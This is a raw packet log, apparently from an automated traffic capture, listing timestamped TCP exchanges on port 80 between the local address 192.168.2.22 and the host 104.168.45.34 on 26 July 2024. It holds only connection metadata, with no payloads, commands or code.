Jul 26, 2024 13:02:42.218652964 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.218664885 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.218698978 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.218705893 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.219408035 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.219419003 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.219429016 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.219446898 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.219455957 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.220638037 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.220649004 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.220683098 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.220693111 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.222222090 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.222232103 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.222258091 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.222265005 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.223890066 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.223901033 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.223934889 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.225070953 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.225081921 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.225090981 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.225097895 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.225105047 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.225122929 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.226535082 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.226545095 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.226579905 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.226588964 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.227991104 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.228001118 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.228027105 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.229496002 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.229505062 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.229516029 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.229522943 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.229537964 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.230782032 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.230792046 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.230818987 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.230827093 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.232204914 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.232217073 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.232227087 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.232237101 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.232253075 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.233411074 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.233422041 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.233448982 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.233457088 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.234656096 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.234669924 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.234689951 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.234705925 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.235884905 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.235894918 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.235917091 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.235924959 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.237019062 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.237030029 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.237040997 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.237051964 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.237061977 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.237076998 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.238256931 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.238269091 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.238308907 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.238308907 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.239512920 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.239525080 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.239561081 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.240690947 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.240703106 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.240741968 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.241772890 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.241785049 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.241828918 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.242834091 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.242845058 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.242856979 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.242881060 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.242913961 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.243877888 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.243887901 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.243916988 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.244893074 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.244903088 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.244929075 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.244945049 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.245950937 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.245963097 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.246006966 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.246927023 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.246937990 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.246947050 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.246973038 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.246990919 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.248955965 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.248967886 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.249007940 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.249401093 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.249437094 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.253084898 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.253146887 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.253345966 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.253355980 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.253386974 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.253402948 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.261603117 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.296524048 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.296576023 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.296849012 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.296860933 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.296885014 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.296901941 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.297810078 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.297821045 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.297844887 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.297854900 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.299278021 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.299289942 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.299323082 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.299323082 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.299926043 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.299937010 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.299956083 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.299972057 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.301137924 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.301148891 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.301182032 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.301188946 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.302683115 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.302695990 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.302723885 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.302730083 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.303502083 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.303514004 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.303523064 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.303544998 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.303554058 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.304727077 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.304738045 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.304764986 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.304773092 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.305789948 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.305799961 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.305826902 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.305833101 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.306556940 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.306566954 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.306592941 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.306597948 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.307574034 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.307586908 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.307595968 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.307601929 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.307624102 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.308866024 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.311577082 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.311593056 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.311603069 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.311614990 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.311620951 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.311620951 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.311633110 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.311665058 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.311676025 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.311695099 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.311705112 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.312114954 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.312125921 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.312156916 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.312164068 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.313057899 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.313070059 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.313080072 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.313087940 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.313102961 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.314016104 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.314028025 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.314049006 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.314064980 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.315000057 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.315011024 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.315042019 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.315049887 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.315910101 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.315920115 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.315952063 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.316899061 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.316910982 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.316920996 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.316941023 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.316955090 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.317873001 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.317884922 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.317910910 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.317919016 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.318794012 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.318804979 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.318840981 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.329476118 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.329488039 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.329519987 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.330319881 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.330332041 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.330358982 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.330368042 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.331455946 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.331466913 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.331478119 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.331501007 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.331511021 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.332659960 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.332670927 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.332710981 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.332717896 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.333861113 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.333872080 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.333915949 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.335037947 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.335048914 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.335081100 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.335088968 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.336226940 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.336237907 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.336247921 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.336277008 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.336282969 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.337429047 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.337440014 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.337471962 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.338618994 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.338629961 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.338671923 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.339812994 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.339823008 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.339868069 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.342398882 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.342410088 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.342443943 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.342462063 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.342473030 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.342483044 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.342516899 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.342636108 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.343362093 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.343373060 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.343410969 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.344558001 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.344568968 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.344614029 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.345752001 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.345768929 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.345810890 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.348421097 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.348433018 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.348442078 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.348453045 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.348463058 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.348495007 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.348505974 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.349425077 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.349435091 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.349474907 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.350517035 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.350527048 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.350569010 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.351718903 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.351731062 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.351771116 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.351782084 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.352866888 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.352876902 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.352886915 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.352921009 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.352988005 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.354089022 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.354099989 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.354134083 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.355268955 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.355279922 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.355324030 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.356457949 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.356470108 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.356534958 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.357656002 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.357666969 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.357677937 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.357714891 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.358789921 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.358834982 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.383153915 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.383367062 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.383408070 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.383902073 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.383944988 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.384443045 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.384983063 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.385027885 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.385504007 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.385545969 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.386063099 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.386080027 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.386121035 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.387114048 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.387196064 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.387646914 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.388206959 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.388216972 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.388247967 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.388258934 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.389467001 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.389513969 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.389668941 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.389718056 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.390142918 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.390153885 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.390197992 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.391138077 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.391148090 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.391179085 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.391910076 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.393073082 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.393115044 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.393291950 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.393583059 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.393616915 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.394005060 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.394536018 CEST	80	49176	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:42.394577980 CEST	49176	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:42.395026922 CEST	80	49176	104.168.45.34	192.168.2.22
